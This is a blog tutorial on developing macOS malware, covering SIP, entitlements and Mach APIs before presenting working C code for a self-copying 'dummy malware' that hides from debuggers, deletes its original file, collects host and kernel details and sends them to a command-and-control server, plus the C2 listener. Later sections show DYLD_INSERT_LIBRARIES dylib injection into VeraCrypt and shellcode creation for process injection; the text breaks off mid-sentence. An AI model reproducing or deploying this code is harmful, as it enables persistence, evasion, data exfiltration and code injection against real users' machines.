https://0xf00sec.github.io/0x1A

 
../ ReverseMe   

MacOS X Malware Development

In today's post, We'll explore the process of designing and
developing malware for macOS, which is a Unix-based operating system.
We'll use a classic approach to understanding Apple's internals. To
follow along, you should have a basic understanding of exploitation,
as well as knowledge of C and Python programming, and some
familiarity with low-level assembly language. While the topics may be
advanced, I'll do my best to present them smoothly.

Let's start by understanding the macOS architecture and its security
features. Next, we'll dive into the internals, covering key elements
like the Mach API and the kernel, and we'll walk through some basic
system calls and easy to understand. After that, we'll introduce a
dummy malware sample. Later, we'll explore code injection techniques
and how they're used in malware, and we'll also discuss persistence
methods. To wrap up, we'll demonstrate a basic implementation of
shellcode injection and persistence. Throughout, we'll provide a
detailed, step-by-step breakdown of the code and techniques involved.

Background

a little background from the internet, The Mac OS X kernel (xnu) is
an operating system kernel with a unique lineage, merging the
research-oriented Mach microkernel with the more traditional and
contemporary FreeBSD monolithic kernel. The Mach microkernel combines
a potent abstraction--Mach message-based interprocess communication
(IPC)--with several cooperating servers to constitute the core of an
operating system. Responsible for managing separate tasks within
their own address spaces and comprising multiple threads, the Mach
microkernel also features default servers that offer services like
virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities
such as user management, file systems, and networking. To address
this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel,
specifically its top-half (system call handlers, file systems,
networking, etc.), ported to run atop the Mach microkernel. To
mitigate performance concerns related to excessive IPC messaging
between kernel components, both kernels reside in the same privileged
address space. Nevertheless, the Mach API accessible from kernel code
remains consistent with the Mach API available to user processes.

Osx

Before delving into macOS development, it's crucial to grasp the
fundamentals of the operating system. In this discussion, we'll
primarily focus on understanding the security protections,
particularly System Integrity Protection (SIP),

SIP serves as a vital security feature designed to safeguard critical
system files, directories, and processes from unauthorized
modification or tampering by applications. It imposes restrictions on
write access to protected system locations, even for processes with
root privileges, thus preventing unauthorized alterations. Moreover,
SIP implements additional security measures for system extensions and
kernel drivers. For instance, kernel extensions are required to be
signed by Apple or by developers using a valid Developer ID. This
stringent requirement ensures that only trusted extensions are
permitted to load into the kernel, bolstering the overall security of
the system.

[IMG1]

As we can see, SIP (System Integrity Protection) is turned on,
indicating that the system is benefiting from its security features.
The presence of the "restricted" flag on certain directories
highlights SIP's protection of those specific areas. It's important
to note that SIP's shielding may not extend to subdirectories within
a SIP-protected directory.

To overcome this limitation, Firmlinks come into play. These allow
certain directories to be "firmlinked," which are special symbolic
links protected by SIP. This ensures their functionality even in
SIP-protected locations, enhancing compatibility, Which operate
seamlessly, allowing applications and scripts to treat them as
regular symbolic links without any special handling. This enables the
creation of symbolic links in directories like /usr, /bin, /sbin, and
/etc, which were previously inaccessible due to SIP.

By making use of firmlinks, developers and users can address
compatibility challenges while still enjoying the security advantages
of SIP. It strikes a balance between system protection and
accommodating the needs of applications and scripts that rely on
symbolic links in macOS. The use of firmlinks allows for access and
modification of certain directories, even in traditionally protected
locations. For instance, a firmlink can grant write access to /usr/
local, providing flexibility for installing and managing software and
scripts in that directory.

Entitlements

Now, onto Entitlements, Entitlements are permissions granted to
applications on macOS, dictating their level of access and
capabilities within the system. They control the application's
ability to interact with various system resources, including the
network, file system, hardware, and user privacy-related information.
By granting specific entitlements, macOS ensures that applications
have the necessary permissions to perform their intended tasks while
maintaining system integrity and protecting user privacy.

Entitlements are typically stored in the application's Info.plist
file, which is located within the .app bundle. The Info.plist file
contains metadata and configuration details about the application,
and it includes key-value pairs representing the entitlements. Each
entitlement is represented by a key, denoting the specific permission
or access level, and a value that defines its corresponding setting.

  * For example, an entitlement entry in the Info.plist file may
    appear as follows:

<key>com.apple.security.network.client</key>
<true/>

In this case, the entitlement with the key
"com.apple.security.network.client" indicates that the application
has permission to act as a network client, granting it access to
network resources.

  * We can obtain entitlements of an application by using the
    following command:

codesign --display --entitlements - /path/to/foo.app

The specific entitlements and their corresponding keys and values can
vary based on the application's requirements and the resources it
needs to access. By defining entitlements, macOS ensures that
applications operate within predefined boundaries, promoting
security, privacy, and controlled access to system resources.

Info.plist

Now, let's talk about Property List (plist) files. file format used
on macOS to store structured data, such as configuration settings,
preferences, and metadata. They have a hierarchical structure with
key-value pairs and support various data types. Property list files
can be in XML or binary format.

In the context of macOS, property list files are commonly used for
storing application metadata, entitlements, sandboxing settings, and
code signing details. For example:

  * Entitlements: Property list files, like the Info.plist, can
    contain entitlements that grant permissions to applications,
    specifying their access to system resources.
  * Sandbox: Property list files define sandbox settings that
    restrict an application's access to resources, enhancing security
    and protecting user privacy.
  * Code Signing: Property list files store information related to
    code signing, verifying the authenticity and integrity of an
    application.

Property List (plist) files can hold various data types and have a
hierarchical structure. Here are some commonly used data types and an
example of the plist file structure:

 1. Data Types:
      + String: A sequence of characters.
      + Number: Represents numeric values, including integers and
        floating-point numbers.
      + Boolean: Represents true or false values.
      + Date: Represents a specific date and time.
      + Array: An ordered collection of values.
      + Dictionary: A collection of key-value pairs, where each key
        is unique.

Here's an example of a plist file structure:

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
  <dict>
    <key>com.apple.security.app-sandbox</key>
    <true/>
    <key>com.apple.security.files.user-selected.read-only</key>
    <true/>
    <key>com.apple.security.network.client</key>
    <true/>
  </dict>
</plist>

In this example, the property list file contains a dictionary with
several entitlement keys related to sandboxing. Each key represents a
specific entitlement, and the value <true/> indicates that the
corresponding entitlement is enabled.

The three entitlements mentioned in this example are:

  * com.apple.security.app-sandbox: Enables sandboxing for the
    application.
  * com.apple.security.files.user-selected.read-only: Allows
    read-only access to user-selected files.
  * com.apple.security.network.client: Grants the application
    permission to act as a network client.

This simplified example demonstrates how property list files can
store entitlements related to sandboxing, providing a structured
format for specifying the application's access and permissions within
the sandbox environment.

  * We can use otool to read Info.plist in different formats:

plutil -convert xml1 /Applications/Safari.app/Contents/Info.plist -o -
plutil -convert json /Applications/Safari.app/Contents/Info.plist -o -

Overall, property list files play a crucial role in macOS by
providing a structured and standardized format to store important
information related to entitlements, sandboxing, code signing, and
more. They enable applications and system components to access and
manage this data efficiently, contributing to the security and
integrity of the macOS ecosystem.

That's all we need to know for now. There's more to explore, such as
Gatekeeper, Sandboxing, App Bundles, and so on, but these are the
most important security mechanisms that matter to us for development.
Now let's delve a bit deeper and discuss internal architecture. Why
focus on internals? Well, even though I'm not planning to develop a
rootkit or anything as advanced, it's crucial to understand the OS as
thoroughly as possible from a developer's perspective. After all,
we're writing software.

Mach API's

Let's take a quick look at Mach. Initially designed as a
communication-centric operating system kernel with robust
multiprocessing support, Mach aimed to lay the groundwork for various
operating systems. It favored a microkernel architecture, aiming to
keep essential OS services like file systems, I/O, memory management,
networking, and different OS personalities separate from the kernel.

XNU, whimsically named "X is not UNIX," serves as the kernel for Mac
OS X. Positioned at the core, Darwin and the rest of the OS X
software stack rely on the XNU kernel.

XNU stands out as a hybrid operating system, blending a hardware/Io
tasking interface from the minimalist Mach microkernel with elements
from FreeBSD kernel and its POSIX-compliant API. Understanding how
programs map to processes in virtual memory on OS X can be a bit
tricky due to overlapping definitions. For example, the term "thread"
could refer to either the POSIX API pthreads from BSD or the
fundamental unit of execution within a Mach task. Moreover, there are
two distinct sets of syscalls, each mapped to positive (Mach) or
negative (BSD) numbers.

Mach provides a virtual machine interface, abstracting system
hardware--a common feature in many operating systems. Its core kernel
is designed to be simple and extensible, boasting an Inter-Process
Communication (IPC) mechanism that underpins many kernel services.
Notably, Mach seamlessly integrates IPC capabilities with its virtual
memory subsystem, leading to optimizations and simplifications across
the OS.

On OS X, we deal with "tasks" rather than processes. Tasks, similar
to processes, serve as OS-level abstractions containing all the
resources needed to execute a program. Technically, Mach refers to
its processes as tasks, although the concept of a BSD-style process
that encapsulates a Mach task persists. Resources within a task
include:

  * A virtual address space
  * Inter-process communication (IPC) port rights
  * One or more threads

"Ports" serve as an inter-task communication mechanism, using
structured messages to transmit information between tasks. Operating
solely in kernel space, ports act like P.O. Boxes, albeit with
restrictions on message senders. Ports are identified by
Task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. OS X supports
two thread types (Mach and pthread), depending on whether the code
originates from user or kernel mode. Mach threads reside at the OS's
lowest level in kernel-mode, while pthreads from the BSD realm
execute programs in user-mode. (More in this, later)

Mach redefines the traditional Unix notion of a process into two
components: a task and a thread. In the kernel, a BSD process aligns
with a Mach task. A task serves as a framework for executing threads,
encapsulating resources and defining a program's protection boundary.
Mach ports, versatile abstractions, facilitate IPC mechanisms and
resource operations.

IPC messages in Mach are exchanged between threads for communication,
carrying actual data or pointers to out-of-line data. Message
transfer is asynchronous, with port capabilities exchanged through
messages.

Mach's virtual memory system encompasses machine-independent
components like address maps and memory objects, alongside
machine-dependent elements like the physical map. Memory objects
serve as containers for data mapped into a task's address space,
managed by various pagers handling distinct memory types. Exception
ports, assigned to each task and thread, facilitate exception
handling, allowing multiple handlers to suspend affected threads,
process exceptions, and resume or terminate threads accordingly.

Let's explore the basics of Mach System Calls, including retrieving
system information and performing code injection. This will provide a
fundamental understanding of interacting with macOS, By the way, a
system call is a function of the kernel invoked by a user space. It
can involve tasks like writing to a file descriptor or exiting a
program. Typically, these system calls are wrapped by C functions in
the standard library.

Baby Steps

If we head over to the Mach IPC Interface or Apple documentation we
can find a Mach system call that's pretty handy for getting basic
info about the host system. It tells us stuff like how many CPUs
there are, both maximum and available, the physical and logical CPUs,
memory size, and the max memory size. This call is host_info(), and
it's super useful for getting details about a host, like what kind of
processors are installed, how many are currently available, and the
total memory size.

Now, like a lot of Mach "info" calls, host_info() needs a flavor
argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t host_info_count);

  * HOST_BASIC_INFO: Returns basic system information.
  * HOST_SCHED_INFO: Provides scheduler-related data.
  * HOST_PRIORITY_INFO: Offers scheduler-priority-related
    information.

// Helper macro to check Mach function calls
#define EXIT_ON_MACH_ERROR(func, kr) { \
    if (kr != KERN_SUCCESS) { \
        exit(1); \
    } \
}

Besides host_info(), other calls like host_kernel_version(),
host_get_boot_info(), and host_page_size() can be employed to access
miscellaneous system details.

int main() {
    kern_return_t kr; /* the standard return type for Mach calls */
    mach_port_t myhost;
    char kversion[256];
    host_basic_info_data_t hinfo;
    mach_msg_type_number_t count;
    vm_size_t page_size;


    // Retrieve System Information
    printf("Retrieving System Information...\n");

    // Get send rights to the name port for the current host
    myhost = mach_host_self();

    // Get kernel version
    kr = host_kernel_version(myhost, kversion);
    EXIT_ON_MACH_ERROR("host_kernel_version", kr);

    // Get basic host information
    count = HOST_BASIC_INFO_COUNT; // size of the buffer
    kr = host_info(myhost, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
    EXIT_ON_MACH_ERROR("host_info", kr);

    // Get page size
    kr = host_page_size(myhost, &page_size);
    EXIT_ON_MACH_ERROR("host_page_size", kr);

    // Retrieved information
    printf("Kernel Version: %s\n", kversion);
    printf("Page Size: %u bytes\n", (unsigned int)page_size);
    printf("Host Basic Info:\n");
    printf("  Processor Type: %u\n", hinfo.processor_type);
    printf("  Processor Subtype: %u\n", hinfo.processor_subtype);
    printf("  Physical CPU: %u\n", hinfo.physical_cpu);
    printf("  Physical CPU Max: %u\n", hinfo.physical_cpu_max);
    printf("  Logical CPU: %u\n", hinfo.logical_cpu);
    printf("  Logical CPU Max: %u\n", hinfo.logical_cpu_max);

    // Clean up and exit
    mach_port_deallocate(mach_task_self(), myhost);
    exit(0);
}

So, basically, the code is pretty easy to understand. It just grabs
system information and shows things like the Kernel version, right?
It's simple and harmless. But if we want to learn more about system
calls, we need something different. How about something that acts
more like malware? But let's keep it simple at first. We can start by
writing a code that write a copy of itself to either /usr/bin/ or /
Library/.

To achieve this kind of behavior, we need to use task operations
because we need to control another process and access system
processes. I found specific Mach system calls like pid_for_task(),
task_for_pid(), task_name_for_pid(), and mach_task_self(), which
allow conversion between Mach task ports and Unix PIDs. However, they
essentially bypass the capability model, which means they are
restricted on macOS due to UID checks, entitlements, SIP, etc.,
limiting their use, and are not documented as part of a public API
and are privileged, typically accessible only by processes with
elevated privileges like root or members of the procview group. This
limitation poses a challenge because malware would need elevated
privileges or execution on a privileged account to work unless
obtained through various means.

Thus, we can't use task_for_pid on Apple platform binaries due to
SIP. However, if permitted, we would have the port and could
essentially do anything we want including what I'm about to explain.
Therefore, So for this example we'll use mach_task_self() as it
typically does not require privileges. It retrieves information about
the current task, depending on the security policies enforced.

void hide_process() {
    mach_port_t task_self = mach_task_self();
    kern_return_t kr;

    // Set exception ports to disable debuggers.
    kr = task_set_exception_ports(task_self, EXC_MASK_ALL, MACH_PORT_NULL, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
    if (kr != KERN_SUCCESS) {
        printf("Uh-oh: Failed to set exception ports: %s\n", mach_error_string(kr));
        exit(EXIT_FAILURE);
    }

    printf("Shhh... Process is now hidden\n");
}

the function obtains the task port for the current process using
mach_task_self(), which essentially retrieves a send right to a task
port. In the Mach kernel, a task port represents a task, and sending
a message to this port enables actions to be performed on the
corresponding task.

Next, to set the exception ports to disable debuggers and other forms
of external monitoring. This is achieved through the
task_set_exception_ports() function call. and any received messages
should be directed to a null Mach port. The process then exits with a
failure status.

void copy_file(const char *source_path, const char *dest_path) {
    FILE *source_file = fopen(source_path, "rb");
    if (source_file == NULL) {
        printf("Oops: Failed to open source file for copying: %s\n", strerror(errno));
        exit(EXIT_FAILURE);
    }

    FILE *dest_file = fopen(dest_path, "wb");
    if (dest_file == NULL) {
        printf("Oops: Failed to open destination file for copying: %s\n", strerror(errno));
        fclose(source_file);
        exit(EXIT_FAILURE);
    }

    char buffer[BUF_SIZE];
    size_t bytes_read;
    while ((bytes_read = fread(buffer, 1, sizeof(buffer), source_file)) > 0) {
        fwrite(buffer, 1, bytes_read, dest_file);
    }

    fclose(source_file);
    fclose(dest_file);

    // Grant execute permission for the copied binary
    if (chmod(dest_path, PERMISSIONS) == -1) {
        printf("Oops: Failed to set execute permission for %s\n", dest_path);
        exit(EXIT_FAILURE);
    }

    printf("Hey! copied from %s to %s\n", source_path, dest_path);
}

The function reads data from the source file in chunks and writes it
to the destination file until the entire file is copied. After
copying, it sets execute permission for the copied binary using chmod
() to make it executable.

// Main function
int main(int argc, char *argv[]) {
    // Determine home directory
    const char *home_dir;
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL) {
        printf("Oops: Failed to get home directory\n");
        exit(EXIT_FAILURE);
    }
    home_dir = pw->pw_dir;

    // Construct malware path
    char home_malware_path[PATH_MAX_LENGTH];
    snprintf(home_malware_path, sizeof(home_malware_path), "%s/Library/%s", home_dir, MALWARE_NAME);

    // Check if we have root privileges
    if (geteuid() == 0) {
        // Attempt to copy malware to system directory
        const char *system_malware_path = "/usr/bin/" MALWARE_NAME;
        if (access(system_malware_path, F_OK) != 0) {
            copy_file(argv[0], system_malware_path);
            execute_malware(system_malware_path);
        }
    } else {
        // Attempt to copy malware to user's home directory
        if (access(home_malware_path, F_OK) != 0) {
            copy_file(argv[0], home_malware_path);
            greet_user();
        }
    }

    // Hide the process
    hide_process();

    // Vanish, Damn
    remove(argv[0]);

    return EXIT_SUCCESS;
}

So the logic is as follows: It first checks if it has root privileges
by calling geteuid(). If it does, it attempts to copy itself to /usr/
bin/, and if successful, it executes the copied binary. If it doesn't
have root privileges, it attempts to copy itself to ~/Library/ (the
user's home directory). If successful, it prints "Hello, World!".
After copying itself it calls hide_process() to attempt to hide the
process from detection. Finally, it removes the original binary file
to erase traces of its presence.

This demonstrates a basic technique used by malware to hide itself on
a system by copying itself to a system directory (/usr/bin/) or the
user's home directory (~/Library/) and then attempting to hide its
process from detection.

This is far from being a malicious code, but it does provide us with
valuable insights into working with the Mach API and conducting
low-level system operations. Through this example, we've gained
familiarity with essential concepts such as process management and
communication.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we put a our little program into a debugger, and as you can see
specially in the disassembly part there's instructions correspond to
our operation like /usr/bin/ also you can notice the cleanup
operations are performed, such as deallocating port and exiting the
program.

The Naive Way

After infecting a new host, let's ensure our malware notifies us of
its presence by sending information about the host. Although this
method might seem amateurish - a malware shouldn't connect to a
Command & Control server (C2) initially - since we're just exploring
macOS as a new territory, it's a starting point. We collect system
information such as the system name, release version, machine
architecture, hardware model, user ID, home directory, etc., and then
send this information to the C2. For retrieving or modifying
information about the system and environment, we can make use of
Developer Apple - sysctlbyname. This function enables us to retrieve
specific system information, such as the cache line size, directly
from the system kernel.

However, when it comes to System Owner/User Discovery, we typically
access user-related data through standard POSIX interfaces like
getpwuid(), relying on these interfaces as discussed before. To fetch
the hardware model, we would replace "hw.cachelinesize" with
"hw.model" in the sysctlbyname function call.

Next, we want to gather more information about the host, not just its
hardware model. Now, you may wonder why we don't just use the first
example you introduced. Well, it's simple. This is to showcase how we
access user-related data through standard POSIX interfaces. However,
if you want to introduce the hardware model in the above example,
just

count = sizeof(model); kr = sysctlbyname("hw.model", model, &count, NULL, 0); EXIT_ON_MACH_ERROR("sysctl hw.model", 1);

we also wanna send some information like kernel version, for possible
known vulnerabilities, to escalate, So here's an example, we use the
same function as to get hardware model

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", &kernel_version, &len, NULL, 0) == 0) {
        send_data(sockfd, "\nKernel Version: ");
        send_data(sockfd, kernel_version);

Now let's dump and send more information about the profile of the
infected host, including details such as System Name, Architecture,
Login shell, Home directory and any other relevant data that could
aid in further exploiting or maintaining access to the compromised
system, W'll use function such as uname, getpwuid, and getgrgid,
Let's take a look at the code,

void system_info(int sockfd) {
  struct utsname sys_info;
  char kernel_version[BUF_SIZE];

  // Get system information
  if (uname( & sys_info) != 0) {
    send_error("Failed to get system information");
    return;
  }

  send_data(sockfd, "\nSystem Name: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nRelease Version: ");
  send_data(sockfd, sys_info.release);
  send_data(sockfd, "\nMachine Architecture: ");
  send_data(sockfd, sys_info.machine);
  send_data(sockfd, "\nOperating System: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nVersion: ");
  send_data(sockfd, sys_info.version);

So, the function is pretty self-explanatory; it simply provides a
snapshot of the system and user environment, which is crucial for
gathering information on potential targets. However, since malware
typically only has one chance for infection, it needs to be
self-reliant before attempting to Phone Home. This is why the
approach of using a dummy malware, primarily for testing and
exploring options before developing an actual malware, is essential.

Nevertheless, deploying a dummy malware still provides attackers with
a significant amount of information that could be leveraged for
subsequent targeted attacks or exploiting vulnerabilities, whether in
the kernel or user land. The malware could be multi-staged to ensure
stealth and a low profile. This code can act as stage 1 of an attack,
proliferating itself in the system, waiting to activate stage 2, and
so on. These types of attacks are advanced and hard to detect,
especially in environments like macOS, where malware can remain
undetected for years.

Another type of information gathering employed by macOS malware, as
seen in some reports, involves 'LOLBins' (Living off the Land
Binaries). You can program the malware to simply execute /usr/sbin/
system_profiler -nospawn -detailLevel full, For example.

void system_profiler(int sockfd) {
  FILE * fp;
  char buffer[BUF_SIZE];

  // Execute
  fp = popen("/usr/sbin/system_profiler -nospawn -detailLevel full", "r");
  if (fp == NULL) {
    send_error("Failed");
    return;
  }

  // Read command output and send over to C2 
  while (fgets(buffer, BUF_SIZE, fp) != NULL) {
    send_data(sockfd, buffer);
  }

  pclose(fp);
}

This command alone saves the trouble and provides all the information
about a host that an attacker can gather. However, the catch is that
such commands are visible and can be easily flagged. Despite this, it
remains an easy and effective method for malware to extract details
from the infected host.

Alright, so how do we transmit the data? We use socket. This API
allows us to send data to the connected endpoint, which in this case
is the Command & Control server. Data is sent in the form of strings.
To ensure that the data is properly formatted and transmitted over
the socket to the C2 server, we rely on functions like send() for
sending data, and file I/O functions such as popen() and fgets() for
reliable reading and sending of data. It's pretty simple.

The C2 server is also straightforward, designed solely for handling
incoming connections. It won't have any protection mechanisms to hide
itself from the system where it's running, but this server is basic
for demonstration purposes only. I recommend implementing encryption,
setting up a database to organize data, and generating a temporary ID
to associate with each instance.

The extraction module (ext) starts an autonomous thread listening for
incoming connections from malware instances. Once connected, the
module simply prints the content of the incoming connection (which is
the information extracted by the client) to the standard output.

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;


As you can see, the code itself is quite simple yet functional. Once
the client is executed, the server collects data from the connected
clients, and then closes the connection before resuming listening for
new connections,

Collecting data from client ...

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Operating System: Darwin

Obviously, this will get flagged within seconds if there's a security
mechanism in place. Why, you may ask? Well, the behavior exhibited
here screams malware--from establishing a connection to sending system
information and continuously receiving and executing commands from a
remote server. The network traffic pattern alone is a red flag. Plus,
the transmission of system information immediately after connection
establishment... But the good news is that most Mac users assume
they're safe by default, so they don't entertain the idea that
capable malware could go unnoticed.

So, if this were a targeted attack, something with a bit of
obfuscation, perhaps polymorphic and advanced covert channels for
communication in place, would get the job done. However, this
explanation provides a simple overview of how dummy malware can be
used as a learning piece of code before developing actual malware.
Next, we'll delve into a topic that I find quite interesting. Yes,
you guessed it;

Code Injection

Actually, exploring Code Injection deserves its own article, and I'll
include some resources at the end. However, for now, let's focus on
two techniques that I find quite effective. So, Let's begin by
introducing the first technique, which involves leveraging
environment variables or DYLD_INSERT_LIBRARIES for code injection.

DYLD_INSERT_LIBRARIES is actually a powerful feature that allows
users to preload dynamic libraries into applications, Both developers
and attackers can inject code into running processes without
modifying the original executable file is commonly used to intercept
function calls, manipulate program behavior, or even introduce
malicious functionality into legitimate application, As we gone see,
It's basically a colon separated list of dynamic libraries to load
before the ones specified in the program. This lets you test new
modules of existing dynamic shared libraries that are used in
flat-namespace images by loading a temporary dynamic shared library
with just the new modules.

In simple term's, it will load any dylibs you specify in this
variable before the program loads, essentially injecting a dylib into
the application, So for example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))

void foo() {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

As you can see we have a function foo() that prints to let us know
that we successful injected a library and a system command that
execute a shell to echo basically the same thing and that attribute
((constructor)) marks the function run before the application's main
function, into which we injected the dylib, piece of cake right, But
how do we know identify binaries vulnerable to environment variable
injection, on that later, but first let's just try it on one of our
previous program, So just compile that code like any other program
and run it.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

et voila, When affected, what happens is that it loads any dylibs
specified in this variable before the program loads, essentially
injecting a dylib into the application. This could potentially lead
to privilege escalation, right? Not so fast on the Apple platform
binaries. As of macOS 10.14, third-party developers can opt in to a
hardened runtime for their application, which can prevent the
injection of dylibs using this technique.

So, basically, we can still perform injection when the application is
not defined as having a "Hardened Runtime" and therefore allows the
injection of dylibs using the environment variable. Alternatively,
when the binary is using a hardened runtime and the developer
released it with the appropriate entitlements, let's go over this one
more time:

  * The "Disable-library-validation" entitlement allows any dylib to
    run on the binary even without checking who signed the file and
    the library. This permission usually exists in programs that
    allow community-written plugins.
  * The com.apple.security.cs.allow-dyld-environment-variables
    entitlement loosens the hardened runtime restrictions and allows
    the use of DYLD_INSERT_LIBRARIES to inject a library.

Alright on possible target application, For example to run this on
Safari.app It won't work, because is hardened and lacks the matching
entitlement,

[IMG3]

But that doesn't necessarily imply that the application is not
hardened, as there are other Hardened Runtime features that may not
be reflected in the entitlements. So, to expedite the process, I
found that Veracrypt is not using Hardened Runtime. Therefore, I'm
going to use it as an example for the entire article. Sorry :), Now,
let's attempt to inject it, but first...

__attribute__((constructor))

static void customConstructor(int argc, const char **argv)
{
printf("Foo!\n");
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

So, we simply print 'foo' and log a message using the syslog()
function, which logs an error message indicating successful injection
of a dynamic library (dylib) along with the name of the program.
Let's try it. If we see the following output, it seems that we've
successfully loaded the library:

[IMG4]

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is
hardened and lacks the matching entitlement, we won't be able to load
the library, and consequently, we won't see the desired output.

However, some internal components of macOS expect threads to be
created using the BSD APIs and have all Mach thread structures and
pthread structures set up properly. This can present challenges,
especially with changes introduced in macOS 10.14.

To address this issue, I came across a piece of code called inject.c.
Additionally, I highly recommend reading the "Mac Hacker's Handbook"
as it provides invaluable insights and includes great examples of
interprocess code injection.

From my understanding, the transition from Mach thread APIs to
pthread APIs in macOS, particularly concerning the initialization of
thread structures, presents challenges. However, the discovery of the
_pthread_create_from_mach_thread function provides a viable
alternative for initializing pthread structures from bare Mach
threads. This ensures compatibility and proper functioning of
threaded applications across different macOS versions.

For those interested, I've included examples demonstrating how to
inject code to call dlopen and load a dylib into a remote mach task:
Gist 1 & Gist 2"

Alright, let's discuss the second technique. It's similar to methods
used on Windows, and one common approach is process injection, which
is the ability for one process to execute code in a different
process. In Windows, this is often utilized to evade detection by
antivirus software, for example, through a technique known as DLL
hijacking. This allows malicious code to masquerade as part of a
different executable. In macOS, this technique can have significantly
more impact due to the differences in permissions between
applications.

In the classic Unix security model, each process runs as a specific
user. Each file has an owner, group, and flags that determine which
users are allowed to read, write, or execute that file. Two processes
running as the same user have the same permissions; it is assumed
there is no security boundary between them. Users are considered
security boundaries; processes are not. If two processes are running
as the same user, then one process could attach to the other as a
debugger, allowing it to read or write the memory and registers of
that other process. The root user is an exception, as it has access
to all files and processes. Thus, root can always access all data on
the computer, whether on disk or in RAM.

This was essentially the same security model as macOS until the
introduction of .. yep, SIP (System Integrity Protection)

OS X Shellcode Injection

Alright, so we're going to write a simple shellcode injection program
where the malware's host process injects shellcode into the memory of
a remote process. But before we proceed, let's write a simple
shellcode for testing purposes.

Writing 64-bit assembly on macOS differs somewhat from ELF. Here, you
just need to understand the macOS executable file format, known as
Mach-O. However, for simplicity, we'll stick with the x86_64
architecture and we can later use a linker for Mach-O executables.

A simple "Hello World" program starts by declaring two sections:
.data and .text. The .data section is used for storing initialized
data, while the .text section contains executable code. Then we
define the _main function as the entry point of the program, followed
by a reference point in the code, which we'll call trick. The trick
section will be followed by a call instruction that invokes the
continue subroutine and pops the address of the string 'Hello World!
'. Also, if you notice in the code, we have a system call at the end
that exits our program. The first syscall is for writing data.

section .data
section .text

global _main
        _main:

start:
        jmp trick

continue:
        pop rsi            ; Pop string address into rsi
        mov rax, 0x2000004 ; System call write = 4
        mov rdi, 1         ; Write to standard out = 1
        mov rdx, 14        ; The size to write
        syscall            ; Invoke the kernel
        mov rax, 0x2000001 ; System call number for exit = 1
        mov rdi, 0         ; Exit success = 0
        syscall            ; Invoke the kernel

trick:
        call continue
        db "Hello World!", 0, 0

Alright, it's time to compile. I typically use NASM for assembling my
code. Remember what I mentioned about using the linker to create
Mach-O executables? Well, after assembling the code with NASM, we'll
need to link it using ld. This linker not only brings together the
assembled code but also incorporates necessary system libraries.

~ > ./nasm -f macho64 Hello.asm -o hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Pretty sophisticated, right? Now, to actually turn it into machine
code that we can use for injection, it needs to be converted into a
hexadecimal representation. This representation consists of a small
series of bytes that represent executable machine-language code. It
essentially represents the exact sequence of instructions that the
processor will execute. For this, we can utilize objdump.

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`

If, for some reason, you can't extract the shellcode solely relying
on objdump, you can always script kiddy a simple py, to parse the
assembly output;

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')

    for line in lines:
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)

    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

But does the shellcode work? To ensure its functionality, we should
test whether we can perform a simple injection. One way to do this is
by compiling the shellcode and storing it as a global variable within
